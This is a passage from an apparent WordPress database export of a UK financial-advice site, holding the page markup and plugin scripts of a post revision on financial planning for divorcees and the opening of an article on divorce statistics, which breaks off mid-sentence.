</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n															</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"tab-recent\" class=\"tab tab_content\" style=\"display: none;\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n												</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul class=\"news-list\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 10th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"image\">&#13;\r\n									<a href=\"../5-facts-know-annuities/\">&#13;\r\n																			</a>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n																</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 9th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n<br />\r\n<br />\r\n<br />\r\n<br />\r\n<div class=\"post-holder\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n									<a href=\"../staging-date-social-advisors/\">When is your Staging Date Social Advisors</a>&#13;\r\n									</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"meta\">&#13;\r\n										June 6th, 2017									</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n								</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n							</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n													</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n														</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"categories-3\" class=\"widget widget_categories\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"heading\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Post Categories</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p><select name=\"cat\" id=\"cat\" class=\"postform\"><option value=\"-1\">Select Category</option><option class=\"level-0\" value=\"13\">Annuities  (2)</option><option class=\"level-0\" value=\"8\">Insurance Protection  (5)</option><option class=\"level-0\" value=\"5\">Investments  (3)</option><option class=\"level-0\" value=\"4\">Pensions  (9)</option><option class=\"level-0\" value=\"6\">Trusts  (1)</option><option class=\"level-0\" value=\"33\">Video  (4)</option><option class=\"level-0\" value=\"1\">Wealth Management  (17)</option></select><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var dropdown = document.getElementById(\"cat\"); function onCatChange() { if ( dropdown.options[dropdown.selectedIndex].value > 0 ) {\r\n			location.href = \"http://www.equalitywalk.org.uk/?cat=\"+dropdown.options[dropdown.selectedIndex].value;\r\n		}\r\n	}\r\n	dropdown.onchange = onCatChange;\r\n/* ]]]]><![CDATA[> */\r\n]]></script></a></div>\r\n<div id=\"social_links-widget-2\" class=\"widget social_links\">\r\n<div class=\"heading\">\r\n\r\nGet Social\r\n\r\n</div>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"rss\"><a class=\"rss\" href=\"http://feeds.feedburner.com/Equity SMART\" target=\"_blank\" rel=\"nofollow\">RSS</a>\r\n<div class=\"popup\">\r\n<div class=\"holder\">\r\n\r\nRSS\r\n\r\n</div>\r\n</div></li>\r\n</ul>\r\n</ul>\r\n<ul class=\"social-networks clearfix\">\r\n<ul class=\"social-networks clearfix\">\r\n 	<li class=\"twitter\"><a class=\"twitter\" href=\"https://twitter.com/Invest\" target=\"_blank\" rel=\"nofollow\">Twitter</a>\r\n<div class=\"popup\">\r\n<div class=\"holder\">\r\n\r\nTwitter\r\n\r\n</div>\r\n</div></li>\r\n</ul>\r\n</ul>\r\n</div>\r\n<div id=\"text-23\" class=\"widget widget_text\">\r\n<div class=\"textwidget\"><a href=\"https://my.leadpages.net/leadbox/14392e473f72a2%3A125d9572eb46dc/5699942098141184/\" target=\"_blank\"><img src=\"../WcBxvj97f6ImTTzlT4h-unuce5ZXpmlrf0JzFKpvBWJyilIlbrxaszuw0Y2NMVq3U1GZSw9_oe6GL-pXCIamWAg_s0.jpg\" /></a><script type=\"text/javascript\" src=\"../leadbox-690.js\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<footer class=\"footer-area\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"avada-row\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<section class=\"columns columns-3\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"recent-posts-3\" class=\"footer-widget-col widget_recent_entries\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Our Latest Posts</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<ul>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"/\">How Your Smartphone Can Improve Your Health</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../5-facts-know-annuities/\">5 Facts You Should Know About Annuities</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../new-individual-savings-accounts-qa/\">The New Individual Savings Accounts — Q&amp;A</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n					</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<li>&#13;\r\n				<a href=\"../automatic-enrolment/\">What is Automatic Enrolment</a>&#13;\r\n						</li>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</ul>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div id=\"contact_info-widget-2\" class=\"footer-widget-col contact_info\"><p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>Contact Info</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div class=\"contact-info-container\">\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"address\">Manchester &amp; London</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"phone\">Phone: </p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n		&#13;\r\n		&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p class=\"email\">Email: <a href=\"mailto:enquiries@equalitywalk.org.uk\">Click To Email</a></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		&#13;\r\n				&#13;\r\n				</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n		</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col\">\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<div style=\"clear:both;\"/></article>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</section>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>				&#13;\r\n&#13;\r\n				</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<article class=\"col last\"/></footer>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</div>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>&#13;\r\n	&#13;\r\n			</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<footer id=\"footer\"/><!-- wrapper --><script type=\"text/javascript\" src=\"../maps/api/js_v_3.exp_amp_sensor_false_amp_language_en.js\"/><!-- W3TC-include-js-head --><script type=\"text/javascript\"><![CDATA[ jQuery(window).load(function() { jQuery( \'#wooslider-id-1\' ).flexslider2({namespace: \"wooslider-\" , animation: \'fade\', slideshowSpeed: 7000, animationSpeed: 600, slideshow: true, directionNav: true, keyboard: false, mousewheel: false, pausePlay: false, randomize: false, animationLoop: true, pauseOnAction: true, pauseOnHover: false, smoothHeight: false, touch: true, controlNav: true}); }); ]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.form.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var _wpcf7 = {\"loaderUrl\":\"http://www.equalitywalk.org.uk/wp-content/plugins/contact-form-7/images/ajax-loader.gif\",\"sending\":\"Sending ...\",\"cached\":\"1\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/contact-form-7/includes/js/scripts.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/swfupload.min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */ var iphormL10n = {\"error_submitting_form\":\"An error occurred submitting the form\",\"swfupload_flash_url\":\"http://www.equalitywalk.org.uk/wp-includes/js/swfupload/swfupload.swf\",\"swfupload_upload_url\":\"http://www.equalitywalk.org.uk/?iphorm_swfupload=1\",\"swfupload_too_many\":\"You have attempted to queue too many files\",\"swfupload_file_too_big\":\"This file exceeds the maximum upload size\",\"swfupload_file_empty\":\"This file is empty\",\"swfupload_file_type_not_allowed\":\"This file type is not allowed\",\"swfupload_unknown_queue_error\":\"Unknown queue error, please try again later\",\"swfupload_upload_error\":\"Upload error\",\"swfupload_upload_failed\":\"Upload failed\",\"swfupload_server_io\":\"Server IO error\",\"swfupload_security_error\":\"Security error\",\"swfupload_limit_exceeded\":\"Upload limit exceeded\",\"swfupload_validation_failed\":\"Validation failed\",\"swfupload_upload_stopped\":\"Upload stopped\",\"swfupload_unknown_upload_error\":\"Unknown upload error\",\"plugin_url\":\"http://www.equalitywalk.org.uk/wp-content/plugins/iphorm-form-builder\",\"preview_no_submit\":\"The form cannot be submitted in the preview\"}; /* ]]]]><![CDATA[> */\r\n]]></script><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.iphorm.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.smooth-scroll.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/qtip2/jquery.qtip.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/fancybox/jquery.fancybox-1.3.4.pack.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/uniform/jquery.uniform.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/js/jquery.infieldlabel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/plugins/iphorm-form-builder/themes/light/rounded.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.mousewheel.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/framework/plugins/tf-flexslider/assets/js/jquery.flexslider.min.js\"/><script type=\"text/javascript\" src=\"../wp-includes/js/comment-reply.min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/modernizr-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.carouFredSel-6.2.1-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.prettyPhoto-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.flexslider-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/jquery.fitvids-min.js\"/><script type=\"text/javascript\" src=\"../wp-content/themes/Avada/js/gmap-min.js\"/><script type=\"text/javascript\"><![CDATA[\r\n/* <![CDATA[ */\r\nvar js_local_vars = {\"dropdown_goto\":\"Go to...\",\"mobile_nav_cart\":\"Shopping Cart\",\"page_smoothHeight\":\"false\",\"flex_smoothHeight\":\"false\",\"language_flag\":\"ICL_LANGUAGE_CODE\",\"infinite_blog_finished_msg\":\"<em>All posts displayed</em>\",\"infinite_blog_text\":\"<em>Loading the next set of posts...</em>\",\"portfolio_loading_text\":\"<em>Loading Portfolio Items...</em>\",\"faqs_loading_text\":\"<em>Loading FAQ Items...</em>\",\"order_actions\":\"Details\"};\r\n/* ]]]]><![CDATA[> */\r\n]]></script><script src=\"../wp-content/themes/Avada/js/main.js\" type=\"text/javascript\">// <![CDATA[\r\n<script type=\"text/javascript\" src=\"../wp-content/plugins/js_composer/assets/js/js_composer_front.js\"/></body></p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n</p>\r\n<p>\r\n// ]]></script></div>\r\n</div>\r\n</div>\r\n</div>','Financial Planning for Divorcees','Financial planning associated with divorce is not going to get any easier, it’s one of those areas where you need to take action sooner rather than later.','inherit','closed','closed','','65-revision-v1','','','2018-12-18 16:48:33','2018-12-18 16:48:33','',65,'http://www.equalitywalk.org.uk/65-revision-v1',0,'revision','',0),(358,1,'2018-12-19 10:01:22','2018-12-19 10:01:22','<b>“Til Divorce Do Us Part”</b>\r\n\r\nIn February last year the Office for National Statistics released some depressing figures: The ONS estimates that 42% of marriages now end in divorce  34% of marriages are expected to end in divorce by the 20th wedding anniversary.\r\n\r\nThe greatest chance of divorce is between the 4th and 8th wedding anniversaries. In 2017 there were 127,588 divorces in England and Wales: the comparable figure for Scotland (from the Registrar General) was 9,814. See stats here.\r\n\r\nThe Scottish figure was the lowest for thirty years – so on the face of it the trend may be reversing. Sadly, that is almost certainly <i>not </i>the case. It is widely accepted that the recession means that many couples who wanted to divorce simply couldn’t afford it – in some cases couples are even having to continue living together after they’ve taken the decision to divorce. But with the economy now improving we will almost certainly see an upturn in the divorce statistics.\r\n\r\n<strong>No-one gets married with the intention of splitting up</strong> – but as the figures show, all too often a marriage ends with the couple going their separate ways. If the divorce happens at a relatively young age and there are <em>no children involved then it can be a simple process</em>. If that’s the case with you, <a 